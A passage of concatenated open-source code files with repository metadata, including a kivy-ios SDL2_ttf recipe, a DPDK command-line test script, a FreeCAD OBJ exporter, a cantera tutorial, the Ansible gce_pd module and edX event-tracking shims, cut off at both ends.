        MTTSettings.set_value('showWrongNameState', self.wrong_name_btn.isChecked())
        MTTSettings.remove('pinnedNode')
        MTTSettings.set_value('vizWrongNameState', self.wrong_name_visibility_btn.isChecked())
        MTTSettings.set_value('showBasenameState', self.basename_visibility_btn.isChecked())
        MTTSettings.set_value('filterInstances', self.filter_instances_btn.isChecked())
        # groups states
        MTTSettings.set_value('filterGroup', self.filter_grp.current_state())
        MTTSettings.set_value('visibilityGroup', self.visibility_grp.current_state())
        MTTSettings.set_value('folderGroup', self.folder_grp.current_state())
        MTTSettings.set_value('autoGroup', self.auto_grp.current_state())
        MTTSettings.set_value('toolGroup', self.tool_grp.current_state())
        MTTSettings.set_value('mayaGroup', self.maya_grp.current_state())
| mit |
rnixx/kivy-ios | recipes/sdl2_ttf/__init__.py | 3 | 1111 | from toolchain import Recipe, shprint
from os.path import join
import sh
import shutil
import shlex
class LibSDL2TTFRecipe(Recipe):
    """kivy-ios recipe building SDL2_ttf as a static library for iOS."""
    version = "2.0.12"
    url = "https://www.libsdl.org/projects/SDL_ttf/release/SDL2_ttf-{version}.tar.gz"
    library = "libSDL2_ttf.a"
    include_dir = "SDL_ttf.h"
    depends = ["sdl2", "freetype"]

    def build_arch(self, arch):
        # XCode-iOS have shipped freetype that don't work with i386
        # ./configure require too much things to setup it correcly.
        # so build by hand.
        # Compile the single SDL_ttf.c translation unit, then archive it.
        build_env = arch.get_env()
        cc = sh.Command(build_env["CC"])
        output = join(self.build_dir, "SDL_ttf.o")
        args = shlex.split(build_env["CFLAGS"])
        args += ["-c", "-o", output, "SDL_ttf.c"]
        shprint(cc, *args)
        shprint(sh.ar, "-q", join(self.build_dir, "libSDL2_ttf.a"), output)

    def install(self):
        # Copy the public header next to the other SDL2 headers for every
        # architecture that was built.
        for arch in self.filtered_archs:
            shutil.copy(
                join(self.get_build_dir(arch.arch), "SDL_ttf.h"),
                join(self.ctx.include_dir, "common", "SDL2"))
# Module-level instance picked up by the toolchain's recipe loader.
recipe = LibSDL2TTFRecipe()
| mit |
alianmohammad/dpdk | app/cmdline_test/cmdline_test.py | 40 | 3778 | #!/usr/bin/python
# BSD LICENSE
#
# Copyright(c) 2010-2014 Intel Corporation. All rights reserved.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Intel Corporation nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# Script that runs cmdline_test app and feeds keystrokes into it.
import sys, pexpect, string, os, cmdline_test_data
#
# function to run test
#
def runTest(child,test):
    # Feed the recorded keystrokes to the app under test.
    child.send(test["Sequence"])
    # A test without an expected result only drives input.
    if test["Result"] == None:
        return 0
    # Wait at most 1 second for the expected output; pexpect raises on timeout.
    child.expect(test["Result"],1)
#
# history test is a special case
#
# This test does the following:
# 1) fills the history with garbage up to its full capacity
# (just enough to remove last entry)
# 2) scrolls back history to the very beginning
# 3) checks if the output is as expected, that is, the first
# number in the sequence (not the last entry before it)
#
# This is a self-contained test, it needs only a pexpect child
#
def runHistoryTest(child):
    # find out history size
    child.sendline(cmdline_test_data.CMD_GET_BUFSIZE)
    child.expect("History buffer size: \\d+", timeout=1)
    history_size = int(child.after[len(cmdline_test_data.BUFSIZE_TEMPLATE):])
    i = 0

    # fill the history with numbers
    # each entry is 9 digits + newline, i.e. 10 bytes of history buffer
    while i < history_size / 10:
        # add 1 to prevent from parsing as octals
        child.send("1" + str(i).zfill(8) + cmdline_test_data.ENTER)
        # the app will simply print out the number
        child.expect(str(i + 100000000), timeout=1)
        i += 1
    # scroll back history
    # i + 2 presses should land past the oldest surviving entry,
    # so the echoed line must be the very first number entered
    child.send(cmdline_test_data.UP * (i + 2) + cmdline_test_data.ENTER)
    child.expect("100000000", timeout=1)
# the path to cmdline_test executable is supplied via command-line.
# NOTE: this is a Python 2 script (print statements, pexpect py2 API).
if len(sys.argv) < 2:
    print "Error: please supply cmdline_test app path"
    sys.exit(1)

test_app_path = sys.argv[1]

if not os.path.exists(test_app_path):
    print "Error: please supply cmdline_test app path"
    sys.exit(1)

child = pexpect.spawn(test_app_path)

print "Running command-line tests..."
for test in cmdline_test_data.tests:
    # print the test name left-aligned, result appended on the same line
    print (test["Name"] + ":").ljust(30),
    try:
        runTest(child,test)
        print "PASS"
    except:
        # any pexpect timeout/mismatch counts as failure; dump child state
        print "FAIL"
        print child
        sys.exit(1)

# since last test quits the app, run new instance
child = pexpect.spawn(test_app_path)

print ("History fill test:").ljust(30),
try:
    runHistoryTest(child)
    print "PASS"
except:
    print "FAIL"
    print child
    sys.exit(1)
child.close()
sys.exit(0)
| lgpl-2.1 |
balazs-bamer/FreeCAD-Surface | src/Mod/Arch/importOBJ.py | 9 | 5268 | #***************************************************************************
#* *
#* Copyright (c) 2011 *
#* Yorik van Havre <yorik@uncreated.net> *
#* *
#* This program is free software; you can redistribute it and/or modify *
#* it under the terms of the GNU Lesser General Public License (LGPL) *
#* as published by the Free Software Foundation; either version 2 of *
#* the License, or (at your option) any later version. *
#* for detail see the LICENCE text file. *
#* *
#* This program is distributed in the hope that it will be useful, *
#* but WITHOUT ANY WARRANTY; without even the implied warranty of *
#* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the *
#* GNU Library General Public License for more details. *
#* *
#* You should have received a copy of the GNU Library General Public *
#* License along with this program; if not, write to the Free Software *
#* Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 *
#* USA *
#* *
#***************************************************************************
import FreeCAD, DraftGeomUtils, Part, Draft
from DraftTools import translate
# number of decimal places used when rounding/comparing coordinates
p = Draft.precision()

# Python 2: keep a handle on the builtin open() before FreeCAD's importer
# machinery may shadow it; export() writes files through pythonopen.
if open.__module__ == '__builtin__':
    pythonopen = open
def findVert(aVertex, aList, precision=None):
    """Return the index of *aVertex* in *aList*, or None if absent.

    Vertices are compared coordinate-wise (X, Y, Z) after rounding each
    coordinate to *precision* decimal places. When *precision* is None the
    module-level Draft precision ``p`` is used, preserving the historical
    behaviour; passing it explicitly makes the function usable standalone.
    """
    prec = p if precision is None else precision
    for i, v in enumerate(aList):
        if (round(aVertex.X, prec) == round(v.X, prec)
                and round(aVertex.Y, prec) == round(v.Y, prec)
                and round(aVertex.Z, prec) == round(v.Z, prec)):
            return i
    # explicit: no matching vertex found
    return None
def getIndices(shape,offset):
    "returns 3 lists: vertex coords, edge indices and face indices, each index offsetted with the given amount"
    vlist = []
    elist = []
    flist = []
    curves = None
    # detect non-linear edges: OBJ has no curve primitive, so the whole
    # shape is tessellated once if any curve is found
    for e in shape.Edges:
        if not isinstance(e.Curve,Part.Line):
            if not curves:
                curves = shape.tessellate(1)
                FreeCAD.Console.PrintWarning(translate("Arch","Found a shape containing curves, triangulating\n"))
    if curves:
        # tessellated path: curves[0] is the vertex list, curves[1] the triangles
        for v in curves[0]:
            vlist.append(" "+str(round(v.x,p))+" "+str(round(v.y,p))+" "+str(round(v.z,p)))
        for f in curves[1]:
            fi = ""
            for vi in f:
                fi += " " + str(vi + offset)
            flist.append(fi)
    else:
        # polygonal path: use the shape's own vertices directly
        for v in shape.Vertexes:
            vlist.append(" "+str(round(v.X,p))+" "+str(round(v.Y,p))+" "+str(round(v.Z,p)))
        if not shape.Faces:
            # no faces: export straight edges as OBJ "l" (line) elements
            for e in shape.Edges:
                if DraftGeomUtils.geomType(e) == "Line":
                    ei = " " + str(findVert(e.Vertexes[0],shape.Vertexes) + offset)
                    ei += " " + str(findVert(e.Vertexes[-1],shape.Vertexes) + offset)
                    elist.append(ei)
        for f in shape.Faces:
            if len(f.Wires) > 1:
                # if we have holes, we triangulate
                tris = f.tessellate(1)
                for fdata in tris[1]:
                    fi = ""
                    for vi in fdata:
                        vdata = Part.Vertex(tris[0][vi])
                        fi += " " + str(findVert(vdata,shape.Vertexes) + offset)
                    flist.append(fi)
            else:
                fi = ""
                # OCC vertices are unsorted. We need to sort in the right order...
                edges = DraftGeomUtils.sortEdges(f.OuterWire.Edges)
                #print edges
                for e in edges:
                    #print e.Vertexes[0].Point,e.Vertexes[1].Point
                    v = e.Vertexes[0]
                    fi += " " + str(findVert(v,shape.Vertexes) + offset)
                flist.append(fi)
    return vlist,elist,flist
def export(exportList,filename):
    "called when freecad exports a file"
    # Write all visible Part-based objects of exportList to *filename* in
    # Wavefront OBJ format, one "o" object per FreeCAD object.
    outfile = pythonopen(filename,"wb")
    ver = FreeCAD.Version()
    outfile.write("# FreeCAD v" + ver[0] + "." + ver[1] + " build" + ver[2] + " Arch module\n")
    outfile.write("# http://www.freecadweb.org\n")
    # OBJ indices are global and 1-based, so keep a running vertex offset.
    offset = 1
    for obj in exportList:
        if obj.isDerivedFrom("Part::Feature"):
            if obj.ViewObject.isVisible():
                vlist,elist,flist = getIndices(obj.Shape,offset)
                offset += len(vlist)
                outfile.write("o " + obj.Name + "\n")
                for v in vlist:
                    outfile.write("v" + v + "\n")
                for e in elist:
                    outfile.write("l" + e + "\n")
                for f in flist:
                    outfile.write("f" + f + "\n")
    outfile.close()
    FreeCAD.Console.PrintMessage(translate("Arch","successfully written ")+filename+"\n")
| lgpl-2.1 |
BozhkoAlexander/mtasa-blue | vendor/google-breakpad/src/tools/gyp/test/mac/gyptest-xcode-gcc-clang.py | 254 | 1403 | #!/usr/bin/env python
# Copyright (c) 2012 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
Verifies that xcode-style GCC_... settings that require clang are handled
properly.
"""
import TestGyp
import os
import sys
# Clang-specific GCC_... settings are only meaningful on Mac toolchains.
if sys.platform == 'darwin':
    test = TestGyp.TestGyp(formats=['ninja', 'make', 'xcode'])

    CHDIR = 'xcode-gcc'
    test.run_gyp('test-clang.gyp', chdir=CHDIR)

    # Each target toggles -fstrict-aliasing; the built binary prints whether
    # the compiler actually applied the aliasing assumption.
    test.build('test-clang.gyp', 'aliasing_yes', chdir=CHDIR)
    test.run_built_executable('aliasing_yes', chdir=CHDIR, stdout="1\n")
    test.build('test-clang.gyp', 'aliasing_no', chdir=CHDIR)
    test.run_built_executable('aliasing_no', chdir=CHDIR, stdout="0\n")

    # The default behavior changed: strict aliasing used to be off, now it's on
    # by default. The important part is that this is identical for all generators
    # (which it is). TODO(thakis): Enable this once the bots have a newer Xcode.
    #test.build('test-clang.gyp', 'aliasing_default', chdir=CHDIR)
    #test.run_built_executable('aliasing_default', chdir=CHDIR, stdout="1\n")
    # For now, just check the generated ninja file:
    if test.format == 'ninja':
        contents = open(test.built_file_path('obj/aliasing_default.ninja',
                                             chdir=CHDIR)).read()
        # The default target must not pass any strict-aliasing flag at all.
        if 'strict-aliasing' in contents:
            test.fail_test()

    test.pass_test()
| gpl-3.0 |
ernestyalumni/Propulsion | cantera_stuff/tut7.py | 1 | 2427 | ## tut7.py
## tut7.m implemented in Python for cantera
## cf. http://www.cantera.org/docs/sphinx/html/matlab/tutorials/tut7.html
############################################################################
## Copyleft 2016, Ernest Yeung <ernestyalumni@gmail.com>
## 20160125
##
## This program, along with all its code, is free software; you can redistribute
## it and/or modify it under the terms of the GNU General Public License as
## published by the Free Software Foundation; either version 2 of the License, or
## (at your option) any later version.
##
## This program is distributed in the hope that it will be useful,
## but WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
## GNU General Public License for more details.
##
## Governing the ethics of using this program, I default to the Caltech Honor Code:
## ``No member of the Caltech community shall take unfair advantage of
## any other member of the Caltech community.''
##
## linkedin : ernestyalumni
## wordpress : ernestyalumni
############################################################################
# Tutorial 7: Thermodynamic Properties
#
import cantera as ct
# A variety of thermodynamic property methods are provided.
gas = ct.Solution('air.cti')  # or gas = ct.Solution('air.cti','air')
# Set state to 800 K and 1 atm; composition keeps its default.
gas.TP = 800, ct.one_atm

# temperature, pressure, density
T = gas.T
P = gas.P
rho = gas.density       # mass density (kg/m^3)
n = gas.density_mole    # molar density (kmol/m^3)

# species non-dimensional properties
hrt = gas.standard_enthalpies_RT    # vector of h_k/RT

# mixture properties per mole
hmole = gas.enthalpy_mole
umole = gas.int_energy_mole
smole = gas.entropy_mole
gmole = gas.gibbs_mole

# mixture properties per unit mass
hmass = gas.enthalpy_mass
umass = gas.int_energy_mass
smass = gas.entropy_mass
gmass = gas.gibbs_mass
#################################################################
| gpl-2.0 |
nilgoyyou/dipy | dipy/testing/__init__.py | 2 | 1333 | ''' Utilities for testing '''
from os.path import dirname, abspath, join as pjoin
from dipy.testing.spherepoints import sphere_points
from dipy.testing.decorators import doctest_skip_parser
from numpy.testing import assert_array_equal
import numpy as np
from distutils.version import LooseVersion
# Path to the example data shipped with dipy.io tests, resolved relative to
# this package so it works from any working directory.
IO_DATA_PATH = abspath(pjoin(dirname(__file__),
                             '..', 'io', 'tests', 'data'))

# Allow failed import of nose if not now running tests: the assertion
# aliases below are only re-exported when nose is actually installed.
try:
    import nose.tools as nt
except ImportError:
    pass
else:
    from nose.tools import (assert_equal, assert_not_equal,
                            assert_true, assert_false, assert_raises)
def assert_arrays_equal(arrays1, arrays2):
    """Assert that two sequences contain pairwise equal arrays.

    Parameters
    ----------
    arrays1, arrays2 : sequences of array-like
        Compared element by element with
        ``numpy.testing.assert_array_equal``.

    Raises
    ------
    AssertionError
        If the sequences differ in length, or if any pair of arrays is
        not element-wise equal.
    """
    # Materialize first so generators work and lengths can be compared;
    # the previous zip()-only loop silently ignored trailing extra arrays.
    arrays1 = list(arrays1)
    arrays2 = list(arrays2)
    if len(arrays1) != len(arrays2):
        raise AssertionError("Sequences have different lengths: %d != %d"
                             % (len(arrays1), len(arrays2)))
    for arr1, arr2 in zip(arrays1, arrays2):
        assert_array_equal(arr1, arr2)
def setup_test():
    """ Set numpy print options to "legacy" for new versions of numpy

    If imported into a file, nosetest will run this before any doctests.

    References
    -----------
    https://github.com/numpy/numpy/commit/710e0327687b9f7653e5ac02d222ba62c657a718
    https://github.com/numpy/numpy/commit/734b907fc2f7af6e40ec989ca49ee6d87e21c495
    https://github.com/nipy/nibabel/pull/556
    """
    # numpy >= 1.14 changed repr whitespace of floats/arrays, which breaks
    # doctest output comparisons; pin to the 1.13 formatting.
    # NOTE(review): LooseVersion comes from distutils, removed in Python
    # 3.12 — this module would need packaging.version there; confirm the
    # supported Python range.
    if LooseVersion(np.__version__) >= LooseVersion('1.14'):
        np.set_printoptions(legacy='1.13')
| bsd-3-clause |
underyx/ansible-modules-core | cloud/google/gce_pd.py | 32 | 9419 | #!/usr/bin/python
# Copyright 2013 Google Inc.
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
DOCUMENTATION = '''
---
module: gce_pd
version_added: "1.4"
short_description: utilize GCE persistent disk resources
description:
- This module can create and destroy unformatted GCE persistent disks
U(https://developers.google.com/compute/docs/disks#persistentdisks).
It also supports attaching and detaching disks from running instances.
Full install/configuration instructions for the gce* modules can
be found in the comments of ansible/test/gce_tests.py.
options:
detach_only:
description:
- do not destroy the disk, merely detach it from an instance
required: false
default: "no"
choices: ["yes", "no"]
aliases: []
instance_name:
description:
- instance name if you wish to attach or detach the disk
required: false
default: null
aliases: []
mode:
description:
- GCE mount mode of disk, READ_ONLY (default) or READ_WRITE
required: false
default: "READ_ONLY"
choices: ["READ_WRITE", "READ_ONLY"]
aliases: []
name:
description:
- name of the disk
required: true
default: null
aliases: []
size_gb:
description:
- whole integer size of disk (in GB) to create, default is 10 GB
required: false
default: 10
aliases: []
image:
description:
- the source image to use for the disk
required: false
default: null
aliases: []
version_added: "1.7"
snapshot:
description:
- the source snapshot to use for the disk
required: false
default: null
aliases: []
version_added: "1.7"
state:
description:
- desired state of the persistent disk
required: false
default: "present"
choices: ["active", "present", "absent", "deleted"]
aliases: []
zone:
description:
- zone in which to create the disk
required: false
default: "us-central1-b"
aliases: []
service_account_email:
version_added: "1.6"
description:
- service account email
required: false
default: null
aliases: []
pem_file:
version_added: "1.6"
description:
- path to the pem file associated with the service account email
required: false
default: null
aliases: []
project_id:
version_added: "1.6"
description:
- your GCE project ID
required: false
default: null
aliases: []
disk_type:
version_added: "1.9"
description:
- type of disk provisioned
required: false
default: "pd-standard"
choices: ["pd-standard", "pd-ssd"]
aliases: []
requirements: [ "libcloud" ]
author: Eric Johnson <erjohnso@google.com>
'''
EXAMPLES = '''
# Simple attachment action to an existing instance
- local_action:
module: gce_pd
instance_name: notlocalhost
size_gb: 5
name: pd
'''
import sys

# Fail in the Ansible key=value result format (not a traceback) when
# libcloud's GCE support is missing; Provider.GCE is probed to make sure
# the installed libcloud is new enough to know about GCE.
try:
    from libcloud.compute.types import Provider
    from libcloud.compute.providers import get_driver
    from libcloud.common.google import GoogleBaseError, QuotaExceededError, \
        ResourceExistsError, ResourceNotFoundError, ResourceInUseError
    _ = Provider.GCE
except ImportError:
    print("failed=True " + \
        "msg='libcloud with GCE support is required for this module.'")
    sys.exit(1)
def main():
    """Entry point for the gce_pd Ansible module: create, attach, detach or
    destroy a GCE persistent disk according to the module parameters."""
    module = AnsibleModule(
        argument_spec = dict(
            detach_only = dict(type='bool'),
            instance_name = dict(),
            mode = dict(default='READ_ONLY', choices=['READ_WRITE', 'READ_ONLY']),
            name = dict(required=True),
            size_gb = dict(default=10),
            disk_type = dict(default='pd-standard'),
            image = dict(),
            snapshot = dict(),
            state = dict(default='present'),
            zone = dict(default='us-central1-b'),
            service_account_email = dict(),
            pem_file = dict(),
            project_id = dict(),
        )
    )

    gce = gce_connect(module)

    detach_only = module.params.get('detach_only')
    instance_name = module.params.get('instance_name')
    mode = module.params.get('mode')
    name = module.params.get('name')
    size_gb = module.params.get('size_gb')
    disk_type = module.params.get('disk_type')
    image = module.params.get('image')
    snapshot = module.params.get('snapshot')
    state = module.params.get('state')
    zone = module.params.get('zone')

    # Detaching requires knowing which instance to detach from.
    if detach_only and not instance_name:
        module.fail_json(
            msg='Must specify an instance name when detaching a disk',
            changed=False)

    disk = inst = None
    changed = is_attached = False

    json_output = { 'name': name, 'zone': zone, 'state': state, 'disk_type': disk_type }
    if detach_only:
        json_output['detach_only'] = True
        json_output['detached_from_instance'] = instance_name

    if instance_name:
        # user wants to attach/detach from an existing instance
        try:
            inst = gce.ex_get_node(instance_name, zone)
            # is the disk attached?
            for d in inst.extra['disks']:
                if d['deviceName'] == name:
                    is_attached = True
                    json_output['attached_mode'] = d['mode']
                    json_output['attached_to_instance'] = inst.name
        except:
            # Instance lookup failures are tolerated here; a missing
            # instance is reported later only when it actually matters.
            pass

    # find disk if it already exists
    try:
        disk = gce.ex_get_volume(name)
        json_output['size_gb'] = int(disk.size)
    except ResourceNotFoundError:
        pass
    except Exception, e:
        module.fail_json(msg=unexpected_error_msg(e), changed=False)

    # user wants a disk to exist.  If "instance_name" is supplied the user
    # also wants it attached
    if state in ['active', 'present']:

        if not size_gb:
            module.fail_json(msg="Must supply a size_gb", changed=False)
        # Normalize size to a whole number of GB and validate the minimum.
        try:
            size_gb = int(round(float(size_gb)))
            if size_gb < 1:
                raise Exception
        except:
            module.fail_json(msg="Must supply a size_gb larger than 1 GB",
                    changed=False)

        if instance_name and inst is None:
            module.fail_json(msg='Instance %s does not exist in zone %s' % (
                instance_name, zone), changed=False)

        if not disk:
            # image and snapshot are mutually exclusive disk sources.
            if image is not None and snapshot is not None:
                module.fail_json(
                    msg='Cannot give both image (%s) and snapshot (%s)' % (
                        image, snapshot), changed=False)
            lc_image = None
            lc_snapshot = None
            if image is not None:
                lc_image = gce.ex_get_image(image)
            elif snapshot is not None:
                lc_snapshot = gce.ex_get_snapshot(snapshot)
            try:
                disk = gce.create_volume(
                    size_gb, name, location=zone, image=lc_image,
                    snapshot=lc_snapshot, ex_disk_type=disk_type)
            except ResourceExistsError:
                # Another actor created it concurrently; treat as present.
                pass
            except QuotaExceededError:
                module.fail_json(msg='Requested disk size exceeds quota',
                        changed=False)
            except Exception, e:
                module.fail_json(msg=unexpected_error_msg(e), changed=False)
            json_output['size_gb'] = size_gb
            if image is not None:
                json_output['image'] = image
            if snapshot is not None:
                json_output['snapshot'] = snapshot
            changed = True
        if inst and not is_attached:
            try:
                gce.attach_volume(inst, disk, device=name, ex_mode=mode)
            except Exception, e:
                module.fail_json(msg=unexpected_error_msg(e), changed=False)
            json_output['attached_to_instance'] = inst.name
            json_output['attached_mode'] = mode
            changed = True

    # user wants to delete a disk (or perhaps just detach it).
    if state in ['absent', 'deleted'] and disk:
        if inst and is_attached:
            try:
                gce.detach_volume(disk, ex_node=inst)
            except Exception, e:
                module.fail_json(msg=unexpected_error_msg(e), changed=False)
            changed = True
        if not detach_only:
            try:
                gce.destroy_volume(disk)
            except ResourceInUseError, e:
                module.fail_json(msg=str(e.value), changed=False)
            except Exception, e:
                module.fail_json(msg=unexpected_error_msg(e), changed=False)
            changed = True

    json_output['changed'] = changed
    print json.dumps(json_output)
    sys.exit(0)
| gpl-3.0 |
ubc/edx-platform | common/djangoapps/track/shim.py | 71 | 6434 | """Map new event context values to old top-level field values. Ensures events can be parsed by legacy parsers."""
import json
import logging
from opaque_keys import InvalidKeyError
from opaque_keys.edx.keys import UsageKey
log = logging.getLogger(__name__)
# Context values that legacy event consumers expect at the *top level* of the
# event rather than nested under 'context'; hoisted there by
# LegacyFieldMappingProcessor and then stripped by remove_shim_context().
CONTEXT_FIELDS_TO_INCLUDE = [
    'username',
    'session',
    'ip',
    'agent',
    'host',
    'referer',
    'accept_language'
]
class LegacyFieldMappingProcessor(object):
    """Ensures all required fields are included in emitted events.

    Mutates each event in place, hoisting selected context values to the
    top level and renaming 'data'/'timestamp' to the legacy 'event'/'time'
    field names so old log parsers keep working.
    """

    def __call__(self, event):
        context = event.get('context', {})
        if 'context' in event:
            for field in CONTEXT_FIELDS_TO_INCLUDE:
                self.move_from_context(field, event)
            remove_shim_context(event)

        # Legacy format stores the payload under 'event'; browser events
        # historically carried it as a JSON-encoded string.
        if 'data' in event:
            if context.get('event_source', '') == 'browser' and isinstance(event['data'], dict):
                event['event'] = json.dumps(event['data'])
            else:
                event['event'] = event['data']
            del event['data']
        else:
            event['event'] = {}

        # Prefer the context timestamp; fall back to a top-level one, and
        # always remove the non-legacy 'timestamp' key afterwards.
        if 'timestamp' in context:
            event['time'] = context['timestamp']
            del context['timestamp']
        elif 'timestamp' in event:
            event['time'] = event['timestamp']
        if 'timestamp' in event:
            del event['timestamp']

        self.move_from_context('event_type', event, event.get('name', ''))
        self.move_from_context('event_source', event, 'server')
        self.move_from_context('page', event, None)

    def move_from_context(self, field, event, default_value=''):
        """Move a field from the context to the top level of the event."""
        context = event.get('context', {})
        if field in context:
            event[field] = context[field]
            del context[field]
        else:
            # Legacy consumers expect the key to exist even when absent.
            event[field] = default_value
def remove_shim_context(event):
    """Drop context entries that have already been hoisted to the top level,
    plus 'client_id', which only serves Segment.io web analytics."""
    if 'context' not in event:
        return
    context = event['context']
    # Hoisted fields plus the analytics-only client id.
    doomed_fields = set(CONTEXT_FIELDS_TO_INCLUDE)
    doomed_fields.add('client_id')
    for field in doomed_fields:
        context.pop(field, None)
# Maps new-style (mobile) video event names to the legacy event_type values
# emitted by the LMS javascript player; consumed by VideoEventProcessor.
NAME_TO_EVENT_TYPE_MAP = {
    'edx.video.played': 'play_video',
    'edx.video.paused': 'pause_video',
    'edx.video.stopped': 'stop_video',
    'edx.video.loaded': 'load_video',
    'edx.video.position.changed': 'seek_video',
    'edx.video.seeked': 'seek_video',
    'edx.video.transcript.shown': 'show_transcript',
    'edx.video.transcript.hidden': 'hide_transcript',
}
class VideoEventProcessor(object):
    """
    Converts new format video events into the legacy video event format.

    Mobile devices cannot actually emit events that exactly match their counterparts emitted by the LMS javascript
    video player. Instead of attempting to get them to do that, we instead insert a shim here that converts the events
    they *can* easily emit and converts them into the legacy format.

    TODO: Remove this shim and perform the conversion as part of some batch canonicalization process.

    """
    def __call__(self, event):
        name = event.get('name')
        if not name:
            return

        # Only events listed in the map are video events; leave others alone.
        if name not in NAME_TO_EVENT_TYPE_MAP:
            return

        # Convert edx.video.seeked to edx.video.position.changed because edx.video.seeked was not intended to actually
        # ever be emitted.
        if name == "edx.video.seeked":
            event['name'] = "edx.video.position.changed"

        event['event_type'] = NAME_TO_EVENT_TYPE_MAP[name]

        if 'event' not in event:
            return
        payload = event['event']

        # Legacy payloads identify the video by html id, not usage key.
        if 'module_id' in payload:
            module_id = payload['module_id']
            try:
                usage_key = UsageKey.from_string(module_id)
            except InvalidKeyError:
                log.warning('Unable to parse module_id "%s"', module_id, exc_info=True)
            else:
                payload['id'] = usage_key.html_id()

            del payload['module_id']

        if 'current_time' in payload:
            payload['currentTime'] = payload.pop('current_time')

        if 'context' in event:
            context = event['context']

            # Converts seek_type to seek and skip|slide to onSlideSeek|onSkipSeek
            if 'seek_type' in payload:
                seek_type = payload['seek_type']
                if seek_type == 'slide':
                    payload['type'] = "onSlideSeek"
                elif seek_type == 'skip':
                    payload['type'] = "onSkipSeek"
                del payload['seek_type']

            # For the iOS build that is returning a +30 for back skip 30
            if (
                    context['application']['version'] == "1.0.02" and
                    context['application']['name'] == "edx.mobileapp.iOS"
            ):
                if 'requested_skip_interval' in payload and 'type' in payload:
                    if (
                            payload['requested_skip_interval'] == 30 and
                            payload['type'] == "onSkipSeek"
                    ):
                        payload['requested_skip_interval'] = -30

            # For the Android build that isn't distinguishing between skip/seek
            if 'requested_skip_interval' in payload:
                if abs(payload['requested_skip_interval']) != 30:
                    if 'type' in payload:
                        payload['type'] = 'onSlideSeek'

            # Legacy 'page' is the video URL with its last path segment cut off.
            if 'open_in_browser_url' in context:
                page, _sep, _tail = context.pop('open_in_browser_url').rpartition('/')
                event['page'] = page

        # Legacy consumers expect the payload as a JSON string.
        event['event'] = json.dumps(payload)
class GoogleAnalyticsProcessor(object):
    """Decorate events bound for Google Analytics via Segment.

    Copies the course id (when present in the event context) into the GA
    'label' field, and marks every event as non-interactive so tracking
    events do not skew bounce-rate metrics.
    """

    # documentation of fields here: https://segment.com/docs/integrations/google-analytics/
    # this should *only* be used on events destined for segment.com and eventually google analytics
    def __call__(self, event):
        event_context = event.get('context', {})
        course_id = event_context.get('course_id')
        if course_id is not None:
            event['label'] = course_id
        event['nonInteraction'] = 1
| agpl-3.0 |
psoetens/orocos-rtt | tools/scripts/svn2log.py | 11 | 11134 | #!/usr/bin/python
#
# Copyright (c) 2003 The University of Wroclaw.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. The name of the University may not be used to endorse or promote
# products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE UNIVERSITY ``AS IS'' AND ANY EXPRESS OR
# IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES
# OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN
# NO EVENT SHALL THE UNIVERSITY BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
# TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# History:
#
# 2006-08-03 Przedsiebiorstwo Informatyczne CORE <biuro at core.com.pl>:
# * Following options were added:
# -s, --strip-comments strip /* ... */ comments in log
# -O, --only-date generate only dates (without time)
# -L, --no-files generate log without filenames
